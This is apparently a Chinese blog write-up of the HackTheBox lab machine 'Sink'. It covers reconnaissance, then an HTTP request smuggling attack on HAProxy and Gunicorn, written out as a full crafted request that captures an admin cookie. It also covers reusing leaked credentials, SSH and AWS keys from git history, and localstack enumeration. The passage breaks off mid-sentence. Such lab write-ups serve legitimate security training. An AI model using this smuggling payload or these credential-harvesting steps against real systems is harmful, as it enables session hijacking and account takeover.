

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/icon/apple-touch-icon.png">
  <link rel="icon" href="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/icon/favicon.ico">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="何语灵">
  <meta name="keywords" content="">
  
    <meta name="description" content="每周练手">
<meta property="og:type" content="article">
<meta property="og:title" content="HackTheBox - Sink">
<meta property="og:url" content="https://m0ck1ng-b1rd.github.io/2021/12/07/HTB/Sink/index.html">
<meta property="og:site_name" content="M0cK1nG-b1Rd&#39;s site">
<meta property="og:description" content="每周练手">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/images_modified/0fc719df3061177675fd15d156da0ac0.png">
<meta property="article:published_time" content="2021-12-07T05:01:01.000Z">
<meta property="article:modified_time" content="2022-04-14T10:56:56.910Z">
<meta property="article:author" content="何语灵">
<meta property="article:tag" content="HackTheBox">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/images_modified/0fc719df3061177675fd15d156da0ac0.png">
  
  
  
  <title>HackTheBox - Sink - M0cK1nG-b1Rd&#39;s site</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="//picbedddd.oss-cn-beijing.aliyuncs.com/blog/scripts/scroll.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"m0ck1ng-b1rd.github.io","root":"/","version":"1.9.0","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"87rdYWc7BpvmNHtufVgH6hwF-gzGzoHsz","app_key":"FOGIb6hlzKdTWSp4wBpACnWG","server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>

  
<meta name="generator" content="Hexo 6.1.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>M0cK1nG-b1Rd&#39;s site</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/761607.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="HackTheBox - Sink"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2021-12-07 13:01" pubdate>
          2021年12月7日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          5.5k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          46 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar category-bar" style="margin-right: -1rem">
    





<div class="category-list">
  
  
    
    
    
    <div class="category row nomargin-x">
      <a class="category-item 
          list-group-item category-item-action col-10 col-md-11 col-xm-11" title="HackTheBox"
        id="heading-d9fb08be3ed131369df5d4aa808dac70" role="tab" data-toggle="collapse" href="#collapse-d9fb08be3ed131369df5d4aa808dac70"
        aria-expanded="true"
      >
        HackTheBox
        <span class="list-group-count">(16)</span>
        <i class="iconfont icon-arrowright"></i>
      </a>
      
      <div class="category-collapse collapse show" id="collapse-d9fb08be3ed131369df5d4aa808dac70"
           role="tabpanel" aria-labelledby="heading-d9fb08be3ed131369df5d4aa808dac70">
        
        
          
  <div class="category-post-list">
    
    
      
      
        <a href="/2021/12/07/HTB/BountyHunter/" title="HackTheBox - BountyHunter"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - BountyHunter</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/Cap/" title="HackTheBox - Cap"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Cap</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/Driver/" title="HackTheBox - Driver"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Driver</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/Horizontall/" title="HackTheBox - Horizontall"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Horizontall</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/Intelligence/" title="HackTheBox - Intelligence"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Intelligence</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/Monitors/" title="HackTheBox - Monitors"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Monitors</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/Previse/" title="HackTheBox - Previse"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Previse</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/Schooled/" title="HackTheBox - Schooled"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Schooled</span>
        </a>
      
    
      
      
        <a href="/2021/12/13/HTB/Seal/" title="HackTheBox - Seal"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Seal</span>
        </a>
      
    
      
      
        <a href="/2022/04/13/HTB/Shibboleth/" title="HackTheBox - Shibboleth"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Shibboleth</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/Sink/" title="HackTheBox - Sink"
           class="list-group-item list-group-item-action
           active">
          <span class="category-post">HackTheBox - Sink</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/Spider/" title="HackTheBox - Spider"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - Spider</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/StartingPoint-Archetype/" title="HackTheBox - StartingPoint-Archetype"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - StartingPoint-Archetype</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/StartingPoint-Pathfinder/" title="HackTheBox - StartingPoint-Pathfinder"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - StartingPoint-Pathfinder</span>
        </a>
      
    
      
      
        <a href="/2021/12/07/HTB/dynstr/" title="HackTheBox - dynstr"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">HackTheBox - dynstr</span>
        </a>
      
    
      
      
        <a href="/2022/05/19/HTB/Unicode/" title="Unicode"
           class="list-group-item list-group-item-action
           ">
          <span class="category-post">Unicode</span>
        </a>
      
    
  </div>

        
      </div>
    </div>
  
</div>


  </aside>


    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">HackTheBox - Sink</h1>
            
              <p class="note note-info">
                
                  
                    本文最后更新于：2022年4月14日 晚上
                  
                
              </p>
            
            <div class="markdown-body">
              
              <p>insane难度初体验 &amp; HTTP Smuggle攻击实操 &amp; 云渗透学习</p>
<h2 id="0x01-信息收集"><a href="#0x01-信息收集" class="headerlink" title="0x01 信息收集"></a>0x01 信息收集</h2><figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">nmap</span> -sC -sV -v <span class="hljs-number">10.10.10.22</span><br></code></pre></td></tr></table></figure>

<p>发现端口22、3000、5000开启</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210924214339576.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210924214339576"></p>
<p>访问3000端口，可以看到为某代码托管平台：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210924214601390.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210924214601390"></p>
<p>目前没有用户名和密码，但是explore可以发现存在的三个账户信息：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210924215455065.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210924215455065"></p>
<p>目光转向5000端口，注册并进行登录：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210924214613580.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210924214613580"></p>
<p>对该网站进行探索，发现的交互点如下：</p>
<ol>
<li>首页最底下的评论功能：</li>
</ol>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210924215523796.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210924215523796"></p>
<ol start="2">
<li>首页的搜索功能：</li>
</ol>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210924215537392.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210924215537392"></p>
<ol start="3">
<li>笔记功能</li>
</ol>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210924215601360.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210924215601360"></p>
<p>另外还能发现admin账户的信息：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210924220338832.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210924220338832"></p>
<p>对这些存在交互的地方测试XSS，SQLi，SSTI，未果。</p>
<p>转变思路，先抓个包看看，可以发现存在的服务器信息，可以发现后端是<code>gunicorn</code>，然后代理使用了<code>haproxy</code>：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210924220539045.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210924220539045"></p>
<h2 id="0x02-突破口"><a href="#0x02-突破口" class="headerlink" title="0x02 突破口"></a>0x02 突破口</h2><p>Google一下，可以看到HAProxy存在HTTP走私漏洞：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210927161101414.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210927161101414"></p>
<p>对那篇文章进行总结，于此题而言，攻击原理和要点如下：</p>
<ol>
<li><p>正常情况下，对TE(Transfer-Encoding)头的优先级高于CL(Content-Length)头</p>
</li>
<li><p>在特殊字符<code>\v</code>的干扰下，haproxy没能识别出TE头，故遵照CL头的指示将构造的数据包中的所有内容发给了后端即Gunicorn。</p>
</li>
<li><p>Gunicorn不受<code>\v</code>的影响，因而将按TE头的指示以chunked的方式处理HTTP数据包。这种不一致造成了HTTP Smuggling攻击。</p>
</li>
<li><p>在实操过程中，默认的<code>Connection</code>头部值为<code>close</code>，我们需要将其改成<code>keep-alive</code>。这样会有更大概率接到admin用户提交的请求。</p>
</li>
</ol>
<p>实操开始，首先建议在burp中开启对不可打印字符的显示：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929211007548.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929211007548"></p>
<p>然后我们在TE头处插入<code>\v</code> ，方法是先用base64编码，然后在Burp中解码：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">printf</span> \\x0b | <span class="hljs-built_in">base64</span><br><span class="hljs-comment">#输出 Cw==</span><br></code></pre></td></tr></table></figure>

<p>插入<code>\v</code>之后继续构造请求，步骤如下：</p>
<ol>
<li>按chunked方式构造请求，注意结束块处是<code>0\r\n\r\n</code></li>
<li>将一个正常的数据包贴在下面，msg留空来接收数据</li>
<li>更改第一个数据包的<code>Connection</code>头部值为<code>keep-alive</code></li>
<li>更改第二个数据包的CL头为一个较大的值，不然可能拿不到Cookie</li>
</ol>
<p>构造完成的数据包如下：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs http"><span class="hljs-keyword">POST</span> <span class="hljs-string">/comment</span> <span class="hljs-meta">HTTP/1.1</span><br><span class="hljs-attribute">Host</span><span class="hljs-punctuation">: </span>10.10.10.225:5000<br><span class="hljs-attribute">Content-Length</span><span class="hljs-punctuation">: </span>793<br><span class="hljs-attribute">Cache-Control</span><span class="hljs-punctuation">: </span>max-age=0<br><span class="hljs-attribute">Upgrade-Insecure-Requests</span><span class="hljs-punctuation">: </span>1<br><span class="hljs-attribute">Origin</span><span class="hljs-punctuation">: </span>http://10.10.10.225:5000<br><span class="hljs-attribute">Content-Type</span><span class="hljs-punctuation">: </span>application/x-www-form-urlencoded<br><span class="hljs-attribute">User-Agent</span><span class="hljs-punctuation">: </span>Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36<br><span class="hljs-attribute">Accept</span><span class="hljs-punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br><span class="hljs-attribute">Referer</span><span class="hljs-punctuation">: </span>http://10.10.10.225:5000/home<br><span class="hljs-attribute">Accept-Encoding</span><span class="hljs-punctuation">: </span>gzip, deflate<br><span class="hljs-attribute">Accept-Language</span><span class="hljs-punctuation">: </span>zh-CN,zh;q=0.9<br><span class="hljs-attribute">Cookie</span><span class="hljs-punctuation">: </span>lang=zh-CN; i_like_gitea=4218005f51d57007; _csrf=yEJpf7F8mA2tBXrSAu9dix741N86MTYzMjg4MzMxMjczNzA0NTY5MQ; session=eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ.YVPnOg.hkrTsumKBoyp1jpSwxnWouyrNug<br><span class="hljs-attribute">Connection</span><span class="hljs-punctuation">: </span>keep-alive<br><span class="hljs-attribute">Transfer-Encoding</span><span class="hljs-punctuation">: </span>chunked<br><br><span class="language-apache"><span class="hljs-attribute">8</span></span><br><span class="language-apache"><span class="hljs-attribute">msg</span>=test</span><br><span class="language-apache"><span class="hljs-attribute">0</span></span><br><span class="language-apache"></span><br><span class="language-apache"><span class="hljs-attribute">POST</span> /comment HTTP/<span class="hljs-number">1</span>.<span class="hljs-number">1</span></span><br><span class="language-apache"><span class="hljs-attribute">Host</span>: <span class="hljs-number">10.10.10.225:5000</span></span><br><span class="language-apache"><span class="hljs-attribute">Content</span>-Length: <span class="hljs-number">300</span></span><br><span class="language-apache"><span class="hljs-attribute">Cache</span>-Control: max-age=<span class="hljs-number">0</span></span><br><span class="language-apache"><span class="hljs-attribute">Upgrade</span>-Insecure-Requests: <span class="hljs-number">1</span></span><br><span class="language-apache"><span class="hljs-attribute">Origin</span>: http://<span class="hljs-number">10.10.10.225:5000</span></span><br><span class="language-apache"><span class="hljs-attribute">Content</span>-Type: application/x-www-form-urlencoded</span><br><span class="language-apache"><span class="hljs-attribute">User</span>-Agent: Mozilla/<span class="hljs-number">5</span>.<span class="hljs-number">0</span> (X11; Linux x86_64) AppleWebKit/<span class="hljs-number">537</span>.<span class="hljs-number">36</span> (KHTML, like Gecko) Chrome/<span class="hljs-number">93</span>.<span class="hljs-number">0</span>.<span class="hljs-number">4577</span>.<span class="hljs-number">63</span> Safari/<span class="hljs-number">537</span>.<span class="hljs-number">36</span></span><br><span class="language-apache"><span class="hljs-attribute">Accept</span>: text/html,application/xhtml+xml,application/xml;q=<span class="hljs-number">0</span>.<span class="hljs-number">9</span>,image/avif,image/webp,image/apng,*/*;q=<span class="hljs-number">0</span>.<span class="hljs-number">8</span>,application/signed-exchange;v=b3;q=<span class="hljs-number">0</span>.<span class="hljs-number">9</span></span><br><span class="language-apache"><span class="hljs-attribute">Referer</span>: http://<span class="hljs-number">10.10.10.225:5000</span>/home</span><br><span class="language-apache"><span class="hljs-attribute">Accept</span>-Encoding: gzip, deflate</span><br><span class="language-apache"><span class="hljs-attribute">Accept</span>-Language: zh-CN,zh;q=<span class="hljs-number">0</span>.<span class="hljs-number">9</span></span><br><span class="language-apache"><span class="hljs-attribute">Cookie</span>: lang=zh-CN; i_like_gitea=<span class="hljs-number">4218005</span>f51d57007; _csrf=yEJpf7F8mA2tBXrSAu9dix741N86MTYzMjg4MzMxMjczNzA0NTY5MQ; session=eyJlbWFpbCI6InRlc3RAdGVzdC5jb20ifQ.YVPnOg.hkrTsumKBoyp1jpSwxnWouyrNug</span><br><span class="language-apache"></span><br><span class="language-apache"><span class="hljs-attribute">msg</span>=</span><br></code></pre></td></tr></table></figure>



<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929123824540.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929123824540"></p>
<p>发送数据包，拿到Cookie，替换后以admin账户身份登录站点：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929212909092.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929212909092"></p>
<p>在admin的note处可以发现三条凭证信息：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929124842229.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929124842229"></p>
<p>分别如下：</p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs ada">Chef Login : <span class="hljs-type">http</span>://chef.sink.htb Username : <span class="hljs-type">chefadm</span> Password : /6&#x27;<span class="hljs-type">fEGC</span>&amp;zEx&#123;<span class="hljs-number">4</span>]zz<br>Dev Node URL : <span class="hljs-type">http</span>://code.sink.htb Username : <span class="hljs-type">root</span> Password : <span class="hljs-type">FaH</span>@<span class="hljs-number">3</span>L&gt;Z3&#125;)zzfQ3<br>Nagios URL : <span class="hljs-type">https</span>://nagios.sink.htb Username : <span class="hljs-type">nagios_adm</span> Password : <span class="hljs-type">g8</span>&lt;H6GK\&#123;*L.fB3C<br></code></pre></td></tr></table></figure>



<p>第二条记录可以让我们登录进3000端口的gitea。</p>
<p>在Explore中，可以看到该代码托管平台中存在的4个repo：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929130214716.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929130214716"></p>
<p>其中，在Key_Management项目下的ec2.php中查看提交的历史记录，可以发现开发人员由于失误上传的私钥文件：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929131106016.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929131106016"></p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929213332811.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929213332811"></p>
<p>以及aws的<code>access_id</code>和<code>access_secret</code>：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929144333190.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929144333190"></p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929144609360.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929144609360"></p>
<p>保存私钥，<code>chmod 600</code> 后登录之，成功，拿到user.txt：</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929213539864.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929213539864"></p>
<h2 id="0x03-David’s-shell"><a href="#0x03-David’s-shell" class="headerlink" title="0x03 David’s shell"></a>0x03 David’s shell</h2><p>查看一下网络连接状态：</p>
<figure class="highlight perl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs perl">netstat -tulnp <span class="hljs-comment">#这条命令能够看到docker容器，初步排查后确定这不是我们的关注点</span><br><br>netstat -tulnp | <span class="hljs-keyword">grep</span> <span class="hljs-number">127</span> <span class="hljs-comment"># 只看127.0.0.1</span><br></code></pre></td></tr></table></figure>



<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929145011428.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929145011428"></p>
<p>可以看到有个4566端口，结合之前我们发现的代码，不难推测上面跑着一个aws服务。</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929150225487.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929150225487"></p>
<p>但这个地址有些奇怪，搜一下4566端口，可以发现有个localstack，查找资料后得知这就是一个模拟aws云服务的应用，用于云应用的开发和测试。</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929214848290.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929214848290"></p>
<p>然后看下命令，可以发现有<code>aws</code>和<code>awslocal</code>。</p>
<p><code>aws</code>和<code>awslocal</code>的区别是<code>aws</code>需要指定endpoint，<code>awslocal</code>不用。<code>awslocal</code>会直接和localstack进行对话。</p>
<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929150039151.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929150039151"></p>
<p>对aws渗透中常见的<code>lambda</code>、<code>cloudwatch</code>、<code>s3api</code>函数进行测试，发现似乎都没开启相应的服务：</p>
<figure class="highlight dsconfig"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs dsconfig"><span class="hljs-string">awslocal</span> <span class="hljs-string">lambda</span> <span class="hljs-built_in">list-functions</span><br><span class="hljs-string">awslocal</span> <span class="hljs-string">cloudwatch</span> <span class="hljs-built_in">list-dashboards</span><br><span class="hljs-string">awslocal</span> <span class="hljs-string">s3api</span> <span class="hljs-built_in">list-buckets</span><br></code></pre></td></tr></table></figure>

<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929215654596.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929215654596"></p>
<p>由于如上项目与logs有关，使用命令<code>logs</code>模块下的命令对logs进行探索。</p>
<p>如果不清楚命令的话，aws的读命令大多与get、list、describe有关，搜索如下关键字即可快速帮助我们确定命令</p>
<figure class="highlight coq"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs coq">awslocal logs help| <span class="hljs-type">grep</span> -E &#x27;list|<span class="hljs-type">get</span>|<span class="hljs-type">describe</span>&#x27;<br></code></pre></td></tr></table></figure>

<p><img src="https://picbedddd.oss-cn-beijing.aliyuncs.com/2021/09/img/Sink.assets/image-20210929220227493.png" srcset="https://picbedddd.oss-cn-beijing.aliyuncs.com/blog/loading.gif" lazyload alt="image-20210929220227493"></p>
<p>使用命令</p>
